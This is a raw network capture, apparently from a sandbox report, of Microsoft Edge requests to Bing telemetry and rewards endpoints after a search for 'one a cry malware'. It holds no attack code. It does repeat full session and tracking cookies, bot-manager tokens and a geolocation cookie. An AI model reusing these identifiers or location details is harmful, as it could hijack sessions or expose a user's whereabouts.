cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199030.149134cc
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A1188%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1729199029786%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A1188%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1729199029786%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199030.1491352f
POST

https://www.bing.com/rewardsapp/reportActivity?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&IID=SERP.5064&q=one+a+cry+malware&FORM=AWRE

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /rewardsapp/reportActivity?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&IID=SERP.5064&q=one+a+cry+malware&FORM=AWRE HTTP/2.0
host: www.bing.com
content-length: 77
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _C_Auth=
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199030.14913637
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22fbtoptu%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22fbtoptu%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199030.14913639
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22fbtoptd%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22fbtoptd%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199030.1491362f
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22fdbkans_0%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22fdbkans_0%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199030.1491370a
GET

https://www.bing.com/fd/ls/l?BF=MSJ1&IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:1}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?BF=MSJ1&IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:1}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3

Response

HTTP/2.0 200

cache-control: private
content-length: 24472
content-type: text/html; charset=utf-8
content-encoding: gzip
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67117bb6e3574219ba653a59c1c0bc84
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-ceRQzziuB4kbXK+ZhxYMOfr85S2JiXo1FWC1VYU3BLI='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 60101AD5599C41D2A5BF7458825D701F Ref B: LON601060102025 Ref C: 2024-10-17T21:03:50Z
date: Thu, 17 Oct 2024 21:03:50 GMT
set-cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE; expires=Tue, 11-Nov-2025 21:03:50 GMT; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199030.149136bf
GET

https://www.bing.com/fd/ls/l?BF=MSJ0&IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=[{%22T%22:%22CI.BF%22,%22X%22:0}]

msedge.exe

Remote address:

92.123.128.172:443

Request
